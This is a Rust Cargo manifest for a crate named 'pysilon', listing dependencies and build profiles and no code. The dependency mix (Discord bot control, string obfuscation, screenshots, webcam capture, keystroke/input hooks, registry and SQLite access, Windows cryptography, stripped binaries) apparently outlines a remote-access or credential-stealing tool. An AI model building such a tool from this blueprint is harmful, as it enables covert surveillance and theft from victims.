[package]
name = "pysilon"
version = "1.0.0"
edition = "2021"
resolver = "2"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
aes-gcm = "0.10.1"
rbase64 = "2.0.3"
serde_json = "1.0.96"
obfstr = "0.4.3"
screenshots = "0.5.4"
chrono = "0.4.24"
bstr = "1.4.0"
once_cell = "1.17.1"
winreg = "0.50.0"
sqlite = "0.30.4"
rand = "0.8.5"
sysinfo = "0.29.0"
rdev = "0.5.2"
hardware-id = "0.3.0"
reqwest = "0.11.18"

[dependencies.image]
version = "0.24.6"
default-features = false
features = ["png"]

[dependencies.serenity]
version = "0.11.5"
default-features = false
features = ["gateway", "standard_framework", "native_tls_backend"]

[dependencies.tokio]
version = "1.28.1"
features = ["macros", "rt-multi-thread"]

[dependencies.windows]
version = "0.48.0"
features = ["Win32_Security_Cryptography", "Win32_Foundation", "Win32_System_Registry", "Win32_System_LibraryLoader"]

[dependencies.nokhwa]
version = "0.10.3"
features = ["input-native", "output-wgpu"]

[profile.release]
strip = true
debug = false

[profile.dev]
strip = true
debug = false